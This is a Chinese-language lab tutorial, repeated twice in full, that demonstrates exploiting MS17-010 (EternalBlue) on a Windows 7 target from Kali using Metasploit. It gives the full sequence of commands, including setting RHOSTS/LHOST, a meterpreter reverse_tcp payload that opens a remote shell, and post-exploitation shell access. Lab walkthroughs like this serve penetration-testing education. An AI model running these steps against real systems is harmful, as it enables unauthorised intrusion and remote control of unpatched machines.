一、前言:
此处使用kali 2022.3作为攻击机,Windows7 x64旗舰版作为靶机进行演示
二、演示
1、关闭防火墙
这里没有做绕过,所以首先需要手动关闭win7的防火墙
2、查看ip
通过命令查看攻击机和靶机的ip
win7命令:ipconfig
kali命令:ifconfig
win7:192.168.13.132
kali:192.168.13.129
可以看出攻击机和靶机在同一网段下
3、启动msf
运行命令启动msf
msfconsole
启动后会出现一个图案,如果和这个不一样也是正常的,因为这个图案是随机的
4、扫描漏洞进行攻击
运行命令扫描ms17_010漏洞
search ms17_010
选择扫描模块进行漏洞扫描
use auxiliary/scanner/smb/smb_ms17_010
运行攻击模块
use exploit/windows/smb/ms17_010_eternalblue
设置靶机ip
set RHOSTS 192.168.13.132
设置攻击机ip
set LHOST 192.168.13.129
设置攻击载荷
set payload windows/x64/meterpreter/reverse_tcp
进行攻击
exploit
现在就已经攻击成功了
查看系统信息
sysinfo
进入Windows PowerShell
shell
如图所示,会出现乱码
在shell中运行chcp 65001即可解决乱码问题
chcp 65001
然后你就可以在你的靶机里面操作了
一、前言:
此处使用kali 2022.3作为攻击机,Windows7 x64旗舰版作为靶机进行演示
二、演示
1、关闭防火墙
这里没有做绕过,所以首先需要手动关闭win7的防火墙
2、查看ip
通过命令查看攻击机和靶机的ip
win7命令:ipconfig
kali命令:ifconfig
win7:192.168.13.132
kali:192.168.13.129
可以看出攻击机和靶机在同一网段下
3、启动msf
运行命令启动msf
msfconsole
启动后会出现一个图案,如果和这个不一样也是正常的,因为这个图案是随机的
4、扫描漏洞进行攻击
运行命令扫描ms17_010漏洞
search ms17_010
选择扫描模块进行漏洞扫描
use auxiliary/scanner/smb/smb_ms17_010
运行攻击模块
use exploit/windows/smb/ms17_010_eternalblue
设置靶机ip
set RHOSTS 192.168.13.132
设置攻击机ip
set LHOST 192.168.13.129
设置攻击载荷
set payload windows/x64/meterpreter/reverse_tcp
进行攻击
exploit
现在就已经攻击成功了
查看系统信息
sysinfo
进入Windows PowerShell
shell
如图所示,会出现乱码
在shell中运行chcp 65001即可解决乱码问题
chcp 65001
然后你就可以在你的靶机里面操作了